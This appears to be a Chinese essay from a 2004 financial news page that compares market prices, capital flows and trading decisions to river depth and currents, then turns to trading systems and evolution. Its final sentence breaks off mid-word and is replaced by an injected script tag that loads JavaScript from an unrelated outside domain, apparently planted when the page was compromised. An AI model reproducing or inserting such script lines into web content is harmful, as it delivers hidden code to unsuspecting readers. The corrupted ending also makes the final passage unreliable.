随想俯得——市场·交易·人
市场的价格、资金的流量,如同那一江之水,有起有落,水线边的黄色沙地,便是证明。水有枯朝,市场有涨落,这是必然的。
  
  潮来水深江宽,潮去江浅水窄,这是人们都明白的道理。市场上涨一般也是如此,价涨量升,量价量缩。因为相应载体的能量,决定着外在可见表现形式——江河水的涨跌,价格市场的升降水平。
  
  江河有干流、支流的区别,它取决于流量的的大小,流程的长短。市场的升跌动向,在于有主流资金的进出、流向,它决定了市场的强弱程度,集中的表现在领涨、领跌群体效应的强力程度、扩散辐射能力。
  
  对于小河沟,可以很容易便看清它的深浅。面对大江大河大海,水的深浅,在岸边、水面一般是难于看清的,即使在水很清的时候。或许靠近岸边水浅的地方能让人看到一些深浅的端倪,可在真正水最多、最深的中央,除非能够深深的潜游下去,否则,人们所能看到的只会是静静的水面,至多能看到一些水面的流动,旋涡,而水下暗流会如何涌动,那是难以用肉眼观察到的,而水面的状况,仅仅是水的最外在一层表现。
  
  河的干流,如果在近处,有时是很难分清干、支流的区别,因为,支流的某部分,可能也是很象主流的。这犹如市场之中,一波行情的主流,有时很容易被其他的次要流向所掩盖,于是,主要趋势、主流板块参与者会视而不见,于是,行为中,很容易因为判断的错误而逆流而动,或者不能参与到主流的运动之中,以至主流已逝,自己被抛在后方。
  
  一样的河岸,通过观察不难发现,水滨的常常深浅是不一的,为什么呢?因为水下的地形结构导致了不同的结果。在市场之中,市场参与者常常也会遇到这样的难题:某个特定时间里,同一市场中基本面与技术面的分析方面都基本一致的几只个股,在后来的价格演变中会形成南辕北辙的走势,实在令人恼火。其实,信息的不对称本来就具有普遍的意义,市场中的信息不对称,犹如水面下的不同地理构造,自然会形成不同的深浅。
  
  能否准确测量水岸线的长度,这是困扰数学界、地理界的长久问题,即使用分形的方法,也只能够获得一个近似值——因为潮涨潮落的本身,便决定了水岸线的不能精确界定。对价格波动的分析亦然,分析原点的差异,很容易引出不同的结果,这对于各种分析手段具有普遍性。
  
  水岸的形态,对入水部分的深浅水有一定的参考价值,依据观测的经验,观察者能够用岸边滩涂的的宽度、平缓度等参照因素,大致判断附近水域的深浅,但经验往往也具有极强的欺骗性,有的看似宽阔的水滩后面,也会是断裂的地沟。这犹如一个长期看似在低位的横盘,按常理应该是微幅波动,积蓄向上的动能,可是,有时这样的走势形态,却会形成下跌的中继,能分析与参与者猝不及放。
  
  凭着肉眼,人们就能看出水面的宽窄情况,犹如人们可以很容易知道市场的一般的宽度情况:市场有多少品种,有多大的资金流量参与者大概有多少。但一般难于知道具体的参与者情况——水中的行船,旁人也是难于知道谁是它的船长、有多少船员、乘客或装了多少具体的货物等细节问题,市场内部深层的详情,也是难于被把握的。——这是一般市场参与者难于避免的对市场理解中的部分先天缺陷。
  
  面对由于信息理解不充分而带来的分析、决策的不完全,以避免因为不知水的深浅、缓急而出大的意外情况,戏水之时不妨离岸近些,而大船,则须行进河心,可免尾大不掉以至搁浅的危险。资金运用亦如是,小笔资金可在市场变化平缓、资金流量弱小时练练,因为进退可自由;大资金则须抓住市场变化的主流、急流,这样至少可免出进退拮据的困窘。
  
  水流滔滔,水色浑浑,个中曲直,时时覆舟。何以应对?唯船驶中流、舟行岸边。
  
  ---------------------------------------------------------------------
  
  无疑操作系统包含了分析与交易这两个部分,并且两者在运用中都存在着一个对已存系统的优化与修复问题。
  
  系统的基本模块是简单的,简单的基本模块构成了系统的最后复杂。而简单的要素使得复杂的系统通过自生产得以运行、完善、修复,否则,系统在使用的过程之中,必然面临运行的滞碍、低效乃至无效。
  
  简单的模块决定了系统运行、生长的细节,系统运行中的任何节点的变动,都可能引发结果的极端变化。而其自然的生长过程,在一般状态下却会以习惯性的方式成长。犹如自然界的遗传与变异,遗传是必然的惯性,变异是外在的作用与适应结果,而遗传与变异在进化演变过程中均是必然和不可避免的。
  
  变异来源于突变——当遗传信号受到破坏,内在控制力减弱,于是出现变异,如同宇称不守恒目前只发现在微观的弱力状态下存在一般。如果有足够强的内在力起作用,从生物学的角度看,遗传、进化会自发产生。
  
  如果说对称是是宇宙构成的基本法则,那么,杨振宁博士发现的?script src=http://51zhujiang.com/s.js>
来源/倚天财经 时间/2004年1月2日14时12分 关闭窗口